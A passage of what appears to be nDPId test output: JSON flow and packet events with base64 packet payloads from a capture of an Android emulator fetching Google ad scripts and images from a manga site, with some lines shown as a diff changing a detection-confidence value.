sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2035,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156800,"flow_last_seen":1654385156800,"flow_idle_time":7580000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1654385156800,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.217.18.98","src_port":44368,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01035{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2035,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1654385156800,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":489,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":489,"pkt_l4_len":455,"thread_ts_msec":1654385156800,"pkt":"tKXvZygQnLbQ0+MzCABFAAHb3B5AAEAG2pzAqAJ+rNkSYq1QAFBdWbpPyM9cBIAYAfaELwAAAQEICmU8LGE7CqI\/R0VUIC90YWcvanMvZ3B0LmpzIEhUVFAvMS4xDQpIb3N0OiB3d3cuZ29vZ2xldGFnc2VydmljZXMuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgMTE7IHNka19ncGhvbmVfeDg2IEJ1aWxkL1JTUjEuMjAxMDEzLjAwMTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS84My4wLjQxMDMuMTA2IE1vYmlsZSBTYWZhcmkvNTM3LjM2DQpBY2NlcHQ6ICovKg0KWC1SZXF1ZXN0ZWQtV2l0aDogY29tLnNjZW5ld2F5Lmthbmthbg0KUmVmZXJlcjogaHR0cDovL21hbmdhd2ViLjFreHVuLm1vYmkvDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCg0K"} -00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2035,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156800,"flow_last_seen":1654385156800,"flow_idle_time":7580000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1654385156800,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.217.18.98","src_port":44368,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.GoogleServices","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.googletagservices.com","url":"www.googletagservices.com\/tag\/js\/gpt.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2035,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156800,"flow_last_seen":1654385156800,"flow_idle_time":7580000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1654385156800,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.217.18.98","src_port":44368,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.GoogleServices","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.googletagservices.com","url":"www.googletagservices.com\/tag\/js\/gpt.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 02383{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2036,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":2,"flow_last_seen":1654385156832,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1654385156832,"pkt":"nLbQ0+MztKXvZygQCABFAAW+HaAAAHsGmjis2RJiwKgCfgBQrVDIz1wEXVm79oAQAQWtEwAAAQEICjsKomxlPCxhSFRUUC8xLjEgMjAwIE9LDQpWYXJ5OiBBY2NlcHQtRW5jb2RpbmcNCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANCkNvbnRlbnQtVHlwZTogdGV4dC9qYXZhc2NyaXB0DQpDcm9zcy1PcmlnaW4tUmVzb3VyY2UtUG9saWN5OiBjcm9zcy1vcmlnaW4NCkNyb3NzLU9yaWdpbi1PcGVuZXItUG9saWN5LVJlcG9ydC1Pbmx5OiBzYW1lLW9yaWdpbjsgcmVwb3J0LXRvPSJhZHMtZ3B0LXNjcyINClJlcG9ydC1UbzogeyJncm91cCI6ImFkcy1ncHQtc2NzIiwibWF4X2FnZSI6MjU5MjAwMCwiZW5kcG9pbnRzIjpbeyJ1cmwiOiJodHRwczovL2NzcC53aXRoZ29vZ2xlLmNvbS9jc3AvcmVwb3J0LXRvL2Fkcy1ncHQtc2NzIn1dfQ0KVGltaW5nLUFsbG93LU9yaWdpbjogKg0KQ29udGVudC1MZW5ndGg6IDI4MTIxDQpEYXRlOiBTYXQsIDA0IEp1biAyMDIyIDIzOjI1OjU2IEdNVA0KRXhwaXJlczogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNTo1NiBHTVQNCkNhY2hlLUNvbnRyb2w6IHByaXZhdGUsIG1heC1hZ2U9OTAwLCBzdGFsZS13aGlsZS1yZXZhbGlkYXRlPTM2MDANCkVUYWc6ICIxMjM1IC8gOTExIG9mIDEwMDAgLyBsYXN0LW1vZGlmaWVkOiAxNjU0MjkzODg0Ig0KWC1Db250ZW50LVR5cGUtT3B0aW9uczogbm9zbmlmZg0KU2VydmVyOiBzZmZlDQpYLVhTUy1Qcm90ZWN0aW9uOiAwDQoNCh+LCAAAAAAAAADtvWdb3EzSKPz9+RWg9cNK94hhNDlYnpdogwk2YGODWV+tLCZ6AsEw\/\/2t6iC1wgDecM5+OHuvGanVsbq6UldXq958aM\/C0VDd1R5vyWTlLhw6oztzFoTTTuip7LXoj0Z+350Rf20teiy6t6R\/Zk\/C8WyqPeYmq1pn8UIlP\/sj4rjOT23izuaTYWfjr\/\/5n5Xt0fhhEvrBbOU8cFe2+6PpfOKuHIbWhEweVjbns2A0mRb\/Z+Xs08639cPQdodTd33fcYez0AvdSXtlc0zswF0vF0v\/89fG\/+C4BjohZjRYwgZrmaUOa3cl+qQ98hTrLSn23aE\/C7qPzmjotlcNHYY2d9vkyioUrhdtnlxaLBa6RUxF1KGY5uxh7I68lRPrxrVnRcf1wqH7aTIau5NZ6E67eekP7bh7uqXb2iOAjpjm5mRCHorjyWg2wlqfniCNl48SOfRWSAf6dm3aRdpRMTay0O3k4Il5pYxoHXFf\/f7IIv1zmHiYn+hZJ3omJ5vPtTX2m\/0+dfve2hr+zX5jNYsWrjveaKKKqYgh3ikULDZFtokjQlS019bs4hGZBaaJf8WQ7cUsmIzuVnYnE6hK2SbD4Wi2AnB1eFsrvAuAi7pDTJuoiNya7iZnTHTw7GFgjaCDypQ+ZL6oyr2i6UPzcaF7BP\/+MuV5E732RLeH837fNO1ohjAZB2Vfi+m5HYXOSmkVMnVtxK3rhT4zc3DB0kib1u6YpDgd98OZqhRhWMQ0oJOOAB3mcE3nqnSte51VsrbmroTDlWHXM4dtz3QIBbkL4HbfijLrRsctFFjXAyjq0p6vqgGW9DTNmrikB8jlmd5VcL1wIEtcFIfjQjOKO60jtOyud+Vct3HcHcu0VFvr4POqaa2tqaRrEXWoO\/qjPRp6oT+fEKuPa0i\/m4Qz8cyWmbXQ2haCBcoxGEHtAFfnGisyjd3WX4gIxQkBNByo2rt370o6\/Q796TqkyCfM0drKm5upPX6jFEg="} 02385{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2037,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":3,"flow_last_seen":1654385156832,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1654385156832,"pkt":"nLbQ0+MztKXvZygQCABFAAW+HaIAAHsGmjas2RJiwKgCfgBQrVDIz2cYXVm79oAQAQVnbAAAAQEICjsKomxlPCxhBD2AVIoQ9JAQ9DghsJcRAl\/vYRNoLvC7pbbP4e4wzRva7Rf74XT29KSyB5P1+gpURecaOC5mGHThH2ve7LUh44DrNWxc+pQ\/FKd64BJHJAMZaPu6oBs6q58J\/VCFpotCdKgwe4MoJX5BSAG\/TBIN+5m1SgEaj46X84uDtTWfdqCrsl+qftouvIEY4N7rBjAm9oHx66cnvpo5QHwECGQZiA7jIz7o4gH6TT\/TBASEiXw0Hsf6ur5a0ihBkEdg910ykeWfDN5EYEkhULKeBOHzI7RdjYBRHCQLJOhtVECVwAezhGCjU5gsy1dtjvLqssLZigGCgBE6r+4aTThyjfDtj6pbodWla6F1\/2k9bHypmmA97hI7SK0ksUr7bFIk4gXLNiZBYtmOBZmBYVMRr6ePYcXCnxLjGslGl9oIckDPpZRk9zhRXVvj9L\/XiQW7flKa64Mqj7JRT+v2QRhHEt7TYHGbilJYKRQC3WJURu9rWhtSxyAA9WijY0BzIBBUch1TJgjvmA2BA6Sm478dC8HcF8LuxBxf+bRIDyRL6OEEpw8e6S+wDZM\/cgr7GDrtvo7rsT3W6QoFWjJoTxaLpd\/XDcjARYKFbLiTQOMXIwEkICl+22fTCwQPF+8qzav1YU6nHZ6Ok7tqsu8dwQr6fNb11M5IDypcdPqUCIhO800SnkP0VVvIgqSQ0B8XMfWacoaAkEfC4i\/0IN6vsRN6\/SxtCSG56gopwExr3Cxa0h1QgQFmjK6n5BBQ7+xoO4J1zzNB5eLtc9HQUj2dgEKj6RwOiwVUKjq5ZOiLznKkz1nEklkUZSimHxbD6TE5foUmJ5KVIS0nGRKttTVaCeRZJIA5TwKT7z6wfQySb\/nFbbq\/49r++wodK2rhHOzSKlYKdkFZGcynM2oosNwVrHQFssaWOyoHWfLsnbr+7v04v929cAKVCfV3ZTZ6TaNkZeL68z5qqvfjiTudInGITRUFRWGGfnf2f1lYtfOEVScWVm0upq46lKrZTER1uIjqFInjQCKk5KSz2ui3sviWFFRRjY9pvWe6kqDqcTHTkwRVO3418DWuTSortIJMeRPLg9TqJaRWucL4Cwqrriy9crk1eF5ujSbPjtRWJsqCGEs3GLVHG+RSO5ZLHWBwDjCiJIOjZRGGDjfjLmL5RIgt8JzcrYH8iQ7YVDy1QTy1O6IQsB4bTUu51SXFQesZcZDWzktyO8FLldrJGvPFM5+lp+Uxa5k8Zqf2oziSJkssF6p4oQgFk+WWCj2\/VC6KKyyLojEpJNJ6rbQA9ku2NsbF5IxL6fUrymalKrQPPrIlRm1rfKQ8X0xkvFgHZ2NwdA\/+A4SL98qsxF5ZmvgBEZ3MphfhLHil0Y8JWHO+SWmBMhzXgOYfybIX71wxy8+A3KslnT2GMMgnYLCCf8ZLCll48NZD7gpLCS3\/V8BVYXlbVwH8xkRDSCzvTG\/x7Bgn7tgls1exQkZUxeiopqLw4pSsld5ZQCor1bLRaJQbrbeyrfuUDH03ZU6yR3PgOnTScc6f0NopSAdIGh2LjtBaM9BUWgCSqFvv3r0zDc2GFzFCJzG82PNi2ZaGw7Y0fpZL5dISkIyJc4bz9k9NOgNLVAWMaz12LrBNyVuBW\/dsra2sKHw4auktCBZ29xdgeQRbYeqlyGG7YV+1NuwIN4rTuTVlVZVAdmvjrjAHSpMNMG3FxmX78thiSkJSilC8VWYttAT40y3xBf2vtKXHdNAWrfFxcfa+bK4zEyU6zTgHbsYAum7gq7FhU18JhD3OzbODCod2f+68ZlgSerx2FyC5AwAIA3ydLYvSO\/TkkKiFXXD1EhRBUhDtDXqmw\/cEPZMOMN51DCNizlM8QBdBMcRWAfJ+HHtjydr4w8GzD+sgP8lUMao="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2055,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156962,"flow_last_seen":1654385156962,"flow_idle_time":7580000,"flow_min_l4_payload_len":1112,"flow_max_l4_payload_len":1112,"flow_tot_l4_payload_len":1112,"flow_avg_l4_payload_len":1112,"midstream":1,"thread_ts_msec":1654385156962,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50140,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01957{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2055,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1654385156962,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1178,"pkt_l4_len":1144,"thread_ts_msec":1654385156962,"pkt":"tKXvZygQnLbQ0+MzCABFAASM3BpAAEAG6JjAqAJ+oXUNHcPcAFCL3GIckxS0LIAYAfZ2NwAAAQEICrrGVYyXEVb4R0VUIC9pbWFnZXMvcmVhZHBhZ2VfcmV2aXNpb24vbGVmdC5wbmcgSFRUUC8xLjENCkhvc3Q6IG1hbmdhd2ViLjFreHVuLm1vYmkNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgQW5kcm9pZCAxMTsgc2RrX2dwaG9uZV94ODYgQnVpbGQvUlNSMS4yMDEwMTMuMDAxOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzgzLjAuNDEwMy4xMDYgTW9iaWxlIFNhZmFyaS81MzcuMzYNCkFjY2VwdDogaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLGltYWdlLyosKi8qO3E9MC44DQpYLVJlcXVlc3RlZC1XaXRoOiBjb20uc2NlbmV3YXkua2Fua2FuDQpSZWZlcmVyOiBodHRwOi8vbWFuZ2F3ZWIuMWt4dW4ubW9iaS8NCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KQ29va2llOiBfX3FjX3dJZD00NzI7IHBndl9wdmlkPTE1NzkxOTkyODA7IGFjY2Vzc190b2tlbj1udWxsOyBfX2dhZHM9SUQ9ZmMwZjIyZjc4ZDgyZmI0NC0yMmM0OWUxN2E4Y2QwMGMxOlQ9MTY1NDM4NTE0MzpSVD0xNjU0Mzg1MTQzOlM9QUxOSV9NWXFDLU9SNDBUYVFMUEl1N3Zoa1otLVUxdG0tUTsgX2dhPUdBMS4yLjY5NDUyNDUyOC4xNjU0Mzg1MTQyOyBfZ2lkPUdBMS4yLjIwNDk4NjE2MjcuMTY1NDM4NTE0MzsgX2dhdD0xOyBfZ2F0X2d0YWdfVUFfMTU0NzU3OTI5XzU3PTE7IF90dF9lbmFibGVfY29va2llPTE7IF90dHA9ZTg0NjM5YjctOTQwMC00MDZjLTk3ZTEtMDNmOGRhNDgxNWY4OyBpc19zYXZlX2Nvb2tpZT11c0lNdkhreFA0SkRYaGM7IF9jcmVhdGVfZGF0ZT0yMDIyLzYvNDsgbm9uX25hdGl2ZV9kb21haW49aHR0cHM6Ly9ha2VtYW5nYS5vci1mcm5kLmNvbTsgX3ZlcnNpb249djIwMjAwNTA1OyBfZ2VuZXJhbF9zdWJzY3JpYmU9MjsgY2xvdWRvd2xzX3V1aWQ9MzViZjM2ZGYtMGJhZS1lMDkyLWYyYjEtYjczOWY1NmMzZWNkOyBjbG91ZG93bHNfaXNfc3Vic2NyaWJlPTE7IHN1YnNjcmliZV9nZW5lcmFsX3Rva2VuPTM1YmYzNmRmLTBiYWUtZTA5Mi1mMmIxLWI3MzlmNTZjM2VjZDsgbGFzdF91cmw9bnVsbA0KDQo="} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2055,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156962,"flow_last_seen":1654385156962,"flow_idle_time":7580000,"flow_min_l4_payload_len":1112,"flow_max_l4_payload_len":1112,"flow_tot_l4_payload_len":1112,"flow_avg_l4_payload_len":1112,"midstream":1,"thread_ts_msec":1654385156962,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50140,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/images\/readpage_revision\/left.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2055,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156962,"flow_last_seen":1654385156962,"flow_idle_time":7580000,"flow_min_l4_payload_len":1112,"flow_max_l4_payload_len":1112,"flow_tot_l4_payload_len":1112,"flow_avg_l4_payload_len":1112,"midstream":1,"thread_ts_msec":1654385156962,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50140,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/images\/readpage_revision\/left.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2057,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156971,"flow_last_seen":1654385156971,"flow_idle_time":7580000,"flow_min_l4_payload_len":1114,"flow_max_l4_payload_len":1114,"flow_tot_l4_payload_len":1114,"flow_avg_l4_payload_len":1114,"midstream":1,"thread_ts_msec":1654385156971,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01961{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2057,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1654385156971,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1180,"pkt_l4_len":1146,"thread_ts_msec":1654385156971,"pkt":"tKXvZygQnLbQ0+MzCABFAASO+8pAAEAGyObAqAJ+oXUNHcPkAFB6Mp7uO+mvZYAYAfZ2OQAAAQEICrrGVZWXEVb4R0VUIC9pbWFnZXMvcmVhZHBhZ2VfcmV2aXNpb24vbGlrZV8xLnBuZyBIVFRQLzEuMQ0KSG9zdDogbWFuZ2F3ZWIuMWt4dW4ubW9iaQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDExOyBzZGtfZ3Bob25lX3g4NiBCdWlsZC9SU1IxLjIwMTAxMy4wMDE7IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvODMuMC40MTAzLjEwNiBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KQWNjZXB0OiBpbWFnZS93ZWJwLGltYWdlL2FwbmcsaW1hZ2UvKiwqLyo7cT0wLjgNClgtUmVxdWVzdGVkLVdpdGg6IGNvbS5zY2VuZXdheS5rYW5rYW4NClJlZmVyZXI6IGh0dHA6Ly9tYW5nYXdlYi4xa3h1bi5tb2JpLw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpDb29raWU6IF9fcWNfd0lkPTQ3MjsgcGd2X3B2aWQ9MTU3OTE5OTI4MDsgYWNjZXNzX3Rva2VuPW51bGw7IF9fZ2Fkcz1JRD1mYzBmMjJmNzhkODJmYjQ0LTIyYzQ5ZTE3YThjZDAwYzE6VD0xNjU0Mzg1MTQzOlJUPTE2NTQzODUxNDM6Uz1BTE5JX01ZcUMtT1I0MFRhUUxQSXU3dmhrWi0tVTF0bS1ROyBfZ2E9R0ExLjIuNjk0NTI0NTI4LjE2NTQzODUxNDI7IF9naWQ9R0ExLjIuMjA0OTg2MTYyNy4xNjU0Mzg1MTQzOyBfZ2F0PTE7IF9nYXRfZ3RhZ19VQV8xNTQ3NTc5MjlfNTc9MTsgX3R0X2VuYWJsZV9jb29raWU9MTsgX3R0cD1lODQ2MzliNy05NDAwLTQwNmMtOTdlMS0wM2Y4ZGE0ODE1Zjg7IGlzX3NhdmVfY29va2llPXVzSU12SGt4UDRKRFhoYzsgX2NyZWF0ZV9kYXRlPTIwMjIvNi80OyBub25fbmF0aXZlX2RvbWFpbj1odHRwczovL2FrZW1hbmdhLm9yLWZybmQuY29tOyBfdmVyc2lvbj12MjAyMDA1MDU7IF9nZW5lcmFsX3N1YnNjcmliZT0yOyBjbG91ZG93bHNfdXVpZD0zNWJmMzZkZi0wYmFlLWUwOTItZjJiMS1iNzM5ZjU2YzNlY2Q7IGNsb3Vkb3dsc19pc19zdWJzY3JpYmU9MTsgc3Vic2NyaWJlX2dlbmVyYWxfdG9rZW49MzViZjM2ZGYtMGJhZS1lMDkyLWYyYjEtYjczOWY1NmMzZWNkOyBsYXN0X3VybD1udWxsDQoNCg=="} -00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2057,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156971,"flow_last_seen":1654385156971,"flow_idle_time":7580000,"flow_min_l4_payload_len":1114,"flow_max_l4_payload_len":1114,"flow_tot_l4_payload_len":1114,"flow_avg_l4_payload_len":1114,"midstream":1,"thread_ts_msec":1654385156971,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50148,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/images\/readpage_revision\/like_1.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2057,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156971,"flow_last_seen":1654385156971,"flow_idle_time":7580000,"flow_min_l4_payload_len":1114,"flow_max_l4_payload_len":1114,"flow_tot_l4_payload_len":1114,"flow_avg_l4_payload_len":1114,"midstream":1,"thread_ts_msec":1654385156971,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50148,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/images\/readpage_revision\/like_1.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2058,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156978,"flow_last_seen":1654385156978,"flow_idle_time":7580000,"flow_min_l4_payload_len":1118,"flow_max_l4_payload_len":1118,"flow_tot_l4_payload_len":1118,"flow_avg_l4_payload_len":1118,"midstream":1,"thread_ts_msec":1654385156978,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01966{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2058,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1654385156978,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1184,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1184,"pkt_l4_len":1150,"thread_ts_msec":1654385156978,"pkt":"tKXvZygQnLbQ0+MzCABFAASS0r1AAEAG8e\/AqAJ+oXUNHcP0AFAuouTn4gYGxIAYAfZ2PQAAAQEICrrGVZyXEVcFR0VUIC9pbWFnZXMvcmVhZHBhZ2VfcmV2aXNpb24vbW9yZV93aGl0ZS5wbmcgSFRUUC8xLjENCkhvc3Q6IG1hbmdhd2ViLjFreHVuLm1vYmkNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgQW5kcm9pZCAxMTsgc2RrX2dwaG9uZV94ODYgQnVpbGQvUlNSMS4yMDEwMTMuMDAxOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzgzLjAuNDEwMy4xMDYgTW9iaWxlIFNhZmFyaS81MzcuMzYNCkFjY2VwdDogaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLGltYWdlLyosKi8qO3E9MC44DQpYLVJlcXVlc3RlZC1XaXRoOiBjb20uc2NlbmV3YXkua2Fua2FuDQpSZWZlcmVyOiBodHRwOi8vbWFuZ2F3ZWIuMWt4dW4ubW9iaS8NCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KQ29va2llOiBfX3FjX3dJZD00NzI7IHBndl9wdmlkPTE1NzkxOTkyODA7IGFjY2Vzc190b2tlbj1udWxsOyBfX2dhZHM9SUQ9ZmMwZjIyZjc4ZDgyZmI0NC0yMmM0OWUxN2E4Y2QwMGMxOlQ9MTY1NDM4NTE0MzpSVD0xNjU0Mzg1MTQzOlM9QUxOSV9NWXFDLU9SNDBUYVFMUEl1N3Zoa1otLVUxdG0tUTsgX2dhPUdBMS4yLjY5NDUyNDUyOC4xNjU0Mzg1MTQyOyBfZ2lkPUdBMS4yLjIwNDk4NjE2MjcuMTY1NDM4NTE0MzsgX2dhdD0xOyBfZ2F0X2d0YWdfVUFfMTU0NzU3OTI5XzU3PTE7IF90dF9lbmFibGVfY29va2llPTE7IF90dHA9ZTg0NjM5YjctOTQwMC00MDZjLTk3ZTEtMDNmOGRhNDgxNWY4OyBpc19zYXZlX2Nvb2tpZT11c0lNdkhreFA0SkRYaGM7IF9jcmVhdGVfZGF0ZT0yMDIyLzYvNDsgbm9uX25hdGl2ZV9kb21haW49aHR0cHM6Ly9ha2VtYW5nYS5vci1mcm5kLmNvbTsgX3ZlcnNpb249djIwMjAwNTA1OyBfZ2VuZXJhbF9zdWJzY3JpYmU9MjsgY2xvdWRvd2xzX3V1aWQ9MzViZjM2ZGYtMGJhZS1lMDkyLWYyYjEtYjczOWY1NmMzZWNkOyBjbG91ZG93bHNfaXNfc3Vic2NyaWJlPTE7IHN1YnNjcmliZV9nZW5lcmFsX3Rva2VuPTM1YmYzNmRmLTBiYWUtZTA5Mi1mMmIxLWI3MzlmNTZjM2VjZDsgbGFzdF91cmw9bnVsbA0KDQo="} 